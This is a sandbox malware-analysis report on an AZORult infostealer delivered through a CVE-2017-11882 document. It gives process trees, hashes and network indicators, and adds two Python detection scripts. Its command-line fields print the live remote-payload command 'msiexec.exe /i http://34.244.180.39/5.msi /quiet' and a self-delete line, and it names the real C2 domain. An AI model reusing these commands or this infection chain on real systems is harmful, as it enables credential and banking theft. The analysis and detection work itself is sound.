File name: DY_POWER_BLCMPL_141800.doc
Full analysis: https://app.any.run/tasks/c684afa3-867d-4284-b21f-18bb97a10187
Verdict: Malicious activity
Threats: AZORult
  AZORult can steal banking information, including passwords and credit card details, as well as cryptocurrency. This constantly updated information stealer should not be taken lightly, as it continues to be an active threat.

Analysis date: November 14, 2018, 07:45:35
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: exploit, CVE-2017-11882, trojan, exe-to-msi, loader, rat, azorult
Indicators:
  MIME:      text/plain
  File info: ASCII text, with very long lines, with CRLF, LF line terminators
  MD5:       BE31B52757BA2B8DB9618D000A20D8DC
  SHA1:      38B5899DE41691BCA03BF87368668088CD9C78BC
  SHA256:    97117F7F2708960DBB4080E3CD458389C7EEA8787E513AC0641A22C65E40AEFD
  SSDEEP:    768:QmKfcZpEHUqUisx+NLBZ3KeD0G1Ig/BKo5g/5m5SfDkfMYBgQ8y+Wh7yK:Q4ZcUisxYtpnUNyz7n

Note that despite the .doc extension the sample is plain ASCII text, not an OLE compound document; Word picks the parser from the file's content rather than its extension, so the extension alone says nothing about the real format, and mail or web filters keyed on extension alone will let such files through.

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Uses Microsoft Installer as loader: cmd.exe (PID: 2892)
    • Equation Editor starts application (CVE-2017-11882): EQNEDT32.EXE (PID: 3500)
    • Actions look like stealing of personal data: MSI3D26.tmp (PID: 3708)
    • Downloads executable files from IP: msiexec.exe (PID: 3804)
    • Downloads executable files from the Internet: msiexec.exe (PID: 3804)
    • AZORULT was detected: MSI3D26.tmp (PID: 3708)
    • Connects to CnC server: MSI3D26.tmp (PID: 3708)
  • SUSPICIOUS
    • Starts CMD.EXE for command execution: EQNEDT32.EXE (PID: 3500), MSI3D26.tmp (PID: 3708)
    • Executable content was dropped or overwritten: msiexec.exe (PID: 3804), MSI3D26.tmp (PID: 3708)
    • Drops ExeToMSI application: msiexec.exe (PID: 3804)
    • Creates files in the user directory: MSI3D26.tmp (PID: 3708)
    • Reads the cookies of Google Chrome: MSI3D26.tmp (PID: 3708)
    • Reads the cookies of Mozilla Firefox: MSI3D26.tmp (PID: 3708)
  • INFO
    • Creates files in the user directory: WINWORD.EXE (PID: 3460)
    • Reads Microsoft Office registry keys: WINWORD.EXE (PID: 3460)
    • Starts application with an unusual extension: msiexec.exe (PID: 3804)
    • Application crashed: EQNEDT32.EXE (PID: 3500)
    • Application was dropped or rewritten from another process: MSI3D26.tmp (PID: 3708)
    • Writes to a desktop.ini file (may be used to cloak folders): msiexec.exe (PID: 3804)
    • Loads dropped or rewritten executable: MSI3D26.tmp (PID: 3708)
Malware configuration: no data extracted.
Total processes: 41
Monitored processes: 8
Malicious processes: 3
Suspicious processes: 0

Behavior graph (process chain, reconstructed from the parent links in the process table below)

  explorer.exe -> WINWORD.EXE (3460)
  svchost.exe -> EQNEDT32.EXE (3500) -> cmd.exe (2892) -> msiexec.exe (2364, user context)
  services.exe -> msiexec.exe (3804, SYSTEM, drops and starts) -> MSI3D26.tmp (3708, #AZORULT) -> cmd.exe (2596) -> timeout.exe (3352)

Process information

PID 3460  WINWORD.EXE  (parent: explorer.exe)
  CMD:         "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\DY_POWER_BLCMPL_141800.doc"
  Path:        C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
  User:        admin    Integrity level: MEDIUM
  Company:     Microsoft Corporation
  Description: Microsoft Word
  Version:     14.0.6024.1000

PID 3500  EQNEDT32.EXE  (parent: svchost.exe)
  CMD:         "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  Path:        C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
  User:        admin    Integrity level: MEDIUM
  Company:     Design Science, Inc.
  Description: Microsoft Equation Editor
  Exit code:   0
  Version:     00110900
  Note: Equation Editor is an out-of-process COM server, so it is launched by the DCOM launcher (svchost.exe) with -Embedding rather than as a child of WINWORD.EXE. Detections that only look for WINWORD.EXE spawning cmd.exe miss this chain; the parent to watch is EQNEDT32.EXE itself.

PID 2892  cmd.exe  (parent: EQNEDT32.EXE)
  CMD:         cmd.exe & /C CD C: & msiexec.exe /i http://34.244.180.39/5.msi /quiet
  Path:        C:\Windows\system32\cmd.exe
  User:        admin    Integrity level: MEDIUM
  Company:     Microsoft Corporation
  Description: Windows Command Processor
  Exit code:   0
  Version:     6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 2364  msiexec.exe  (parent: cmd.exe)
  CMD:         msiexec.exe /i http://34.244.180.39/5.msi /quiet
  Path:        C:\Windows\system32\msiexec.exe
  User:        admin    Integrity level: MEDIUM
  Company:     Microsoft Corporation
  Description: Windows® Installer
  Exit code:   0
  Version:     5.0.7600.16385 (win7_rtm.090713-1255)

PID 3804  msiexec.exe  (parent: services.exe)
  CMD:         C:\Windows\system32\msiexec.exe /V
  Path:        C:\Windows\system32\msiexec.exe
  User:        SYSTEM    Integrity level: SYSTEM
  Company:     Microsoft Corporation
  Description: Windows® Installer
  Version:     5.0.7600.16385 (win7_rtm.090713-1255)
  Note: this is the Windows Installer service instance that actually fetches the package from the URL and writes the payload into C:\Windows\Installer; the user-context msiexec.exe (2364) only hands the request to it.

PID 3708  MSI3D26.tmp  (parent: msiexec.exe)
  CMD:         "C:\Windows\Installer\MSI3D26.tmp"
  Path:        C:\Windows\Installer\MSI3D26.tmp
  User:        admin    Integrity level: MEDIUM
  Company:     Softpointer Inc
  Description: Sparse Nanometer Effects Void Mbiers (junk version-info strings on the dropped payload)
  Exit code:   0

PID 2596  cmd.exe  (parent: MSI3D26.tmp)
  CMD:         "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "MSI3D26.tmp"
  Path:        C:\Windows\system32\cmd.exe
  User:        admin    Integrity level: MEDIUM
  Company:     Microsoft Corporation
  Description: Windows Command Processor
  Exit code:   0
  Version:     6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 3352  timeout.exe  (parent: cmd.exe)
  CMD:         C:\Windows\system32\timeout.exe 3
  Path:        C:\Windows\system32\timeout.exe
  User:        admin    Integrity level: MEDIUM
  Company:     Microsoft Corporation
  Description: timeout - pauses command processing
  Exit code:   0
  Version:     6.1.7600.16385 (win7_rtm.090713-1255)
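The chain above (Equation Editor spawning cmd.exe, msiexec.exe installing a package straight from a URL, the payload executing from C:\Windows\Installer as MSIxxxx.tmp, then wiping itself with cmd /c timeout & del) is easier to hunt in process-creation telemetry than by file hash, because every one of those steps is abnormal on its own. The Python below is an added example, not code from the ANY.RUN report or from the AZORult sample: it encodes the four behaviours as rules and runs them over a constructed event list that mirrors the PIDs and command lines in the table. The placeholder PIDs for explorer.exe, svchost.exe and services.exe, the benign 7-Zip install line, and the choice of 3804 as the parent of MSI3D26.tmp (the report names the parent only as msiexec.exe) are assumptions.

```python
import re

# Constructed process-creation events modelled on the report's process tree.
# PIDs, images, users and command lines of the monitored processes are copied
# from the table above. The three root processes get placeholder PIDs (the
# report names them but not their PIDs), MSI3D26.tmp's parent is assumed to
# be the SYSTEM installer instance 3804, and the final event is a made-up
# benign local MSI install used as a control.
EVENTS = [
    {"pid": 1234, "ppid": 0, "user": "admin", "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 800, "ppid": 0, "user": "SYSTEM", "image": r"C:\Windows\system32\svchost.exe", "cmdline": "svchost.exe"},
    {"pid": 500, "ppid": 0, "user": "SYSTEM", "image": r"C:\Windows\system32\services.exe", "cmdline": "services.exe"},
    {"pid": 3460, "ppid": 1234, "user": "admin", "image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\DY_POWER_BLCMPL_141800.doc"'},
    {"pid": 3500, "ppid": 800, "user": "admin", "image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "cmdline": r'"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding'},
    {"pid": 2892, "ppid": 3500, "user": "admin", "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r"cmd.exe & /C CD C: & msiexec.exe /i http://34.244.180.39/5.msi /quiet"},
    {"pid": 2364, "ppid": 2892, "user": "admin", "image": r"C:\Windows\system32\msiexec.exe",
     "cmdline": r"msiexec.exe /i http://34.244.180.39/5.msi /quiet"},
    {"pid": 3804, "ppid": 500, "user": "SYSTEM", "image": r"C:\Windows\system32\msiexec.exe",
     "cmdline": r"C:\Windows\system32\msiexec.exe /V"},
    {"pid": 3708, "ppid": 3804, "user": "admin", "image": r"C:\Windows\Installer\MSI3D26.tmp",
     "cmdline": r'"C:\Windows\Installer\MSI3D26.tmp"'},
    {"pid": 2596, "ppid": 3708, "user": "admin", "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "MSI3D26.tmp"'},
    {"pid": 3352, "ppid": 2596, "user": "admin", "image": r"C:\Windows\system32\timeout.exe",
     "cmdline": r"C:\Windows\system32\timeout.exe 3"},
    {"pid": 4100, "ppid": 1234, "user": "admin", "image": r"C:\Windows\system32\msiexec.exe",
     "cmdline": r'msiexec.exe /i "C:\Users\admin\Downloads\7z1900.msi" /quiet'},  # benign control
]

# msiexec installing (/i, /package) or admin-installing (/a) from an http(s) URL.
REMOTE_MSI = re.compile(r"\s/(?:i|package|a)\s+[\"']?https?://", re.I)
# Payload executing out of the Windows Installer cache under the MSIxxxx.tmp name.
INSTALLER_TMP = re.compile(r"^c:\\windows\\installer\\msi[0-9a-f]+\.tmp$", re.I)
# cmd /c timeout N & del <file>: the delayed self-delete seen in the report.
SELF_DELETE = re.compile(r'timeout(?:\.exe)?\s+\d+\s*&+\s*del\s+(?:/\w+\s+)*"?([^"\s]+)', re.I)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return [(rule, pid)] for every event that trips one of the four rules."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        pname = basename(parent["image"]) if parent else ""
        name = basename(e["image"])
        # 1. Equation Editor has no business spawning anything; a child process is
        #    code execution inside EQNEDT32.EXE (CVE-2017-11882 and its siblings).
        if pname == "eqnedt32.exe":
            findings.append(("eqnedt32_spawns_child", e["pid"]))
        # 2. Windows Installer pulling the package straight from a URL (exe-to-msi loader).
        if name == "msiexec.exe" and REMOTE_MSI.search(e["cmdline"]):
            findings.append(("msiexec_remote_install", e["pid"]))
        # 3. Something running as C:\Windows\Installer\MSIxxxx.tmp.
        if INSTALLER_TMP.match(e["image"]):
            findings.append(("installer_tmp_executed", e["pid"]))
        # 4. cmd.exe deleting its own parent's image after a timeout.
        m = SELF_DELETE.search(e["cmdline"]) if name == "cmd.exe" else None
        if m and parent and basename(m.group(1)) == pname:
            findings.append(("self_delete_parent", e["pid"]))
    return findings


def ancestry(events, pid):
    """Image names from the root of the tree down to pid, for triage output."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:26} pid {pid}: {' -> '.join(ancestry(EVENTS, pid))}")
```

Rule 1 keys on the parent image rather than on WINWORD.EXE because, as the table shows, Equation Editor is started by svchost.exe, not by Word; rule 4 compares the deleted file name against the parent's image so that an ordinary cleanup script that deletes some other temp file does not fire. The benign local install (PID 4100) trips nothing.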
Total events: 1 634
Read events: 926
Write events: 0
Delete events: 0
Modification events: no data

Executable files: 50
Suspicious files: 2
Text files: 9
Unknown types: 6

Dropped files ("-" = not recorded in the report)

PID   Process      Filename                                                                       Type
3460  WINWORD.EXE  C:\Users\admin\AppData\Local\Temp\CVR3071.tmp.cvr                              -
      MD5: -   SHA256: -
3804  msiexec.exe  C:\Users\admin\AppData\Local\Temp\~DF24F9EDF1D3DE4D6A.TMP                      -
      MD5: -   SHA256: -
3460  WINWORD.EXE  C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm               pgc
      MD5:    1178BF800A7E9A315A240C34A220AC74
      SHA256: D9C88E977D14F6A961A1118B14A375E85A2D6FC2467D14A13161D3D2EBF0E8B7
3804  msiexec.exe  C:\Windows\Installer\MSI389F.tmp                                               executable
      MD5:    FB6B511E96E7BBFEC6DFCD14FC049430
      SHA256: 9EE631BDB3AC7552254386A3AEEE6D8A3342D2D3F5B4E578A15A6800227680D3
3804  msiexec.exe  C:\Windows\Installer\MSI3D26.tmp                                               executable
      MD5:    01329D37BDAF5C58D2F1FF8B4F3900F2
      SHA256: 5A29A74994308E3C2E900653EB95525BF8E7E4926CD7965D61684EBA0B061FDB
3460  WINWORD.EXE  C:\Users\admin\AppData\Local\Temp\~$_POWER_BLCMPL_141800.doc                   pgc
      MD5:    A0429BB8B4E3273DE2187B3B9B096C55
      SHA256: A5A49003E7D5289611EB487F1F022638A74C793EA3D6758E1A0A85E5A0D4F37E
3804  msiexec.exe  C:\Windows\Installer\183b5f.ipi                                                binary
      MD5:    9BC43BA0F5BD660414451EA48E9094CB
      SHA256: 7D5BFBDB980BC6FA6E0CB40DFB04694B9BDEACD85F85E54F3E084049FDA57C83
3804  msiexec.exe  C:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.dat   dat
      MD5:    74593DA273B27EA9E6ADDEA19D7746A0
      SHA256: 83F2686E301182C24294A15B57EA9A3540330AF35F13153C3A8C243D0F655BCB
3804  msiexec.exe  C:\Users\admin\AppData\Local\Temp\Cookies\index.dat                            dat
      MD5:    D7A950FEFD60DBAA01DF2D85FEFB3862
      SHA256: 75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A
3804  msiexec.exe  C:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\0C8JY2B5\desktop.ini   ini
      MD5:    4A3DEB274BB5F0212C2419D3D8D08612
      SHA256: 2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38
HTTP(S) requests: 3
TCP/UDP connections: 2
DNS requests: 1
Threats: 0

HTTP requests

PID   Process      Method  Code  IP                URL                                     CN  Type        Size     Reputation
3804  msiexec.exe  GET     200   34.244.180.39:80  http://34.244.180.39/5.msi              IE  executable  696 Kb   suspicious
3708  MSI3D26.tmp  POST    200   103.63.2.245:80   http://slimiyt.us/michytery/index.php   HK  binary      4.27 Mb  malicious
3708  MSI3D26.tmp  POST    200   103.63.2.245:80   http://slimiyt.us/michytery/index.php   HK  text        2 b      malicious

The installer package was fetched by the SYSTEM msiexec.exe instance from a bare IP over plain HTTP, so there is no DNS lookup and no certificate to pivot on for that stage. The two POSTs from MSI3D26.tmp go to the same index.php URL but differ in what comes back: a 4.27 Mb binary body on the first and 2 bytes of text on the second; the ET "AZORult Variant.4 Checkin" signature listed under Threats fired on this exchange.

Connections

PID   Process      IP                Domain      ASN                     CN  Reputation
3804  msiexec.exe  34.244.180.39:80  -           Amazon.com, Inc.        IE  suspicious
3708  MSI3D26.tmp  103.63.2.245:80   slimiyt.us  Guochao Group limited   HK  suspicious

DNS requests

Domain      IP            Reputation
slimiyt.us  103.63.2.245  malicious
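The HTTP, connection and DNS tables above give two kinds of handle on this traffic: fixed indicators (the C2 domain and the two IPs) and behaviour that survives an infrastructure change (msiexec.exe fetching a package from a bare IP, a .tmp process making web requests, a non-browser POST to index.php answered with a multi-megabyte binary body). The Python below is an added example, not part of the ANY.RUN report: it runs both kinds of check over constructed endpoint HTTP telemetry whose first three lines restate the report's HTTP table. The line format, the timestamps, the benign chrome.exe and msiexec.exe lines, the unrelated panel.example line, the browser list and the 1 MB threshold are assumptions made for the example.

```python
import ipaddress
from urllib.parse import urlparse

# Indicators copied from the report's network tables.
IOC_HOSTS = {"slimiyt.us"}
IOC_IPS = {"34.244.180.39", "103.63.2.245"}
# Processes for which a POST to index.php is unremarkable (assumed list).
BROWSERS = {"chrome.exe", "firefox.exe", "iexplore.exe", "msedge.exe"}

# Constructed endpoint HTTP telemetry, one request per line:
#   timestamp pid process method url status response_bytes response_content_type
# Lines 1-3 restate the report's HTTP table (696 Kb and 4.27 Mb converted to
# bytes approximately); the timestamps and lines 4-6 are made up to exercise
# the rules, line 6 standing in for the same behaviour on unknown infrastructure.
LOG = """\
2018-11-14T07:46:01Z 3804 msiexec.exe GET http://34.244.180.39/5.msi 200 712704 application/x-msi
2018-11-14T07:46:09Z 3708 MSI3D26.tmp POST http://slimiyt.us/michytery/index.php 200 4477614 application/octet-stream
2018-11-14T07:46:12Z 3708 MSI3D26.tmp POST http://slimiyt.us/michytery/index.php 200 2 text/html
2018-11-14T07:47:00Z 1880 chrome.exe GET http://example.org/index.php 200 5120 text/html
2018-11-14T07:47:30Z 2210 msiexec.exe GET http://download.example.org/tools/setup.msi 200 912000 application/x-msi
2018-11-14T08:00:00Z 5012 MSI7A10.tmp POST http://panel.example/gate/index.php 200 4100000 application/octet-stream
"""


def parse(line):
    """Split one telemetry line into a record; raises ValueError on malformed input."""
    ts, pid, proc, method, url, status, nbytes, ctype = line.split()
    return {"ts": ts, "pid": int(pid), "process": proc, "method": method.upper(),
            "url": url, "status": int(status), "bytes": int(nbytes), "ctype": ctype.lower()}


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def classify(rec):
    """Return the rule names a single request trips (empty list if clean)."""
    reasons = []
    parsed = urlparse(rec["url"])
    host = (parsed.hostname or "").lower()
    proc = rec["process"].lower()
    # 1. Plain indicator match against the C2 domain and the two IPs from the report.
    if host in IOC_HOSTS or host in IOC_IPS:
        reasons.append("ioc_match")
    # 2. Windows Installer fetching from a bare IP: no DNS name and no TLS, which is
    #    exactly how msiexec.exe /i http://34.244.180.39/5.msi looks on the wire.
    if proc == "msiexec.exe" and is_ip_literal(host):
        reasons.append("msiexec_fetch_from_ip")
    # 3. Non-browser POST to index.php answered with a multi-megabyte binary body,
    #    the shape of the first AZORult check-in in the report (4.27 Mb binary response).
    if (rec["method"] == "POST" and proc not in BROWSERS and parsed.path.lower().endswith("/index.php")
            and rec["ctype"].startswith("application/octet-stream") and rec["bytes"] > 1_000_000):
        reasons.append("binary_blob_on_post")
    # 4. A process named *.tmp talking HTTP at all; MSIxxxx.tmp from the installer cache never should.
    if proc.endswith(".tmp"):
        reasons.append("tmp_process_network")
    return reasons


def scan(log_text):
    """Return [(line_no, pid, process, reasons)] for every flagged request."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        if not line.strip():
            continue
        rec = parse(line)
        reasons = classify(rec)
        if reasons:
            hits.append((n, rec["pid"], rec["process"], reasons))
    return hits


if __name__ == "__main__":
    for n, pid, proc, reasons in scan(LOG):
        print(f"line {n}: pid {pid} {proc}: {', '.join(reasons)}")
```

The made-up line 6 is flagged on behaviour alone (rules 3 and 4) even though neither its host nor its IP is in the indicator sets, which is the point of keeping the behavioural rules next to the IOC match: the C2 domain in this report will rotate, the check-in shape tends not to. The benign msiexec.exe fetch from a DNS name and the browser request to index.php trip nothing.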

Threats

PID   Process      Class                                   Message
3804  msiexec.exe  A Network Trojan was detected           SC TROJAN_DOWNLOADER Malicious behavior by evader Trojan.Script.Generic
3804  msiexec.exe  Misc activity                           SUSPICIOUS [PTsecurity] Executable application_x-msi Download
3804  msiexec.exe  Potential Corporate Privacy Violation   POLICY [PTsecurity] Executable application_x-msi Download
3804  msiexec.exe  Misc activity                           SUSPICIOUS [PTsecurity] Executable ExeToMSI Download
3708  MSI3D26.tmp  A Network Trojan was detected           ET TROJAN AZORult Variant.4 Checkin M2
3708  MSI3D26.tmp  A Network Trojan was detected           MALWARE [PTsecurity] AZORult client request
3708  MSI3D26.tmp  A Network Trojan was detected           MALWARE [PTsecurity] AZORult HTTP Header
3708  MSI3D26.tmp  A Network Trojan was detected           MALWARE [PTsecurity] AZORult HTTP Header
3708  MSI3D26.tmp  A Network Trojan was detected           MALWARE [PTsecurity] AZORult client request
4 ETPRO signatures available at the full report
Debug info: none